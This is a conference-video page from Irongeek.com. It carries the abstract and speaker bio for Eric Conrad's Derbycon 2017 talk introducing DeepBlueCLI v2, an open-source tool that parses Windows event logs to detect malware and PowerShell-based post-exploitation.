A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Subscribestar or Patreon

Search Irongeek.com:

Irongeek Button
Social-engineer-training Button

Help Irongeek.com pay for bandwidth and research equipment:


Introducing DeepBlueCLI v2, now available in PowerShell and Python - Eric Conrad Derbycon 2017 (Hacking Illustrated Series InfoSec Tutorial Videos)

Introducing DeepBlueCLI v2, now available in PowerShell and Python
Eric Conrad
Derbycon 2017

Recent malware attacks leverage PowerShell for post exploitation. Why? No EXE for antivirus or HIPS to squash, nothing saved to the filesystem, sites that use application whitelisting allow PowerShell, and little to no default logging. Event logs continue to be the best source to centrally hunt malice in a Windows environment. Virtually all malware may be detected (including the latest PowerShell-fueled post exploitation) via event logs, after making small tweaks the logging configuration. DeepBlueCLI will go toe-to-toe with the latest attacks: this talk will explore the evidence malware leaves behind, leveraging Windows command line auditing (now natively available in Windows 7+) and PowerShell logging. DeepBlueCLI is an open source framework that automatically parses Windows event logs, either on Windows (PowerShell version) or now on ELK (Elasticsearch, Logstash and Kibana) running on Linux/Unix (Python version). ELK has revolutionized SIEMs, offering an open source alternative to expensive commercial solutions, and scaling to sizes many commercial SIEMs cannot reach.

Eric's career began in 1991 as a UNIX systems administrator for a small oceanographic communications company. He gained information security experience in a variety of industries, including research, education, power, Internet, and health care. He is now CTO of Backshore Communications, a company focusing on hunt teaming, intrusion detection, incident handling, and penetration testing. He is the lead author of the CISSP Study Guide. Eric is a graduate of the SANS Technology Institute with a master of science degree in information security engineering. In addition to the CISSP, he holds the prestigious GIAC Security Expert (GSE) certification as well as many other GIAC certifications. Eric also blogs about information security at www.ericconrad.com.


Back to Derbycon 2017 video list

Printable version of this article

15 most recent posts on Irongeek.com:

If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2020, IronGeek
Louisville / Kentuckiana Information Security Enthusiast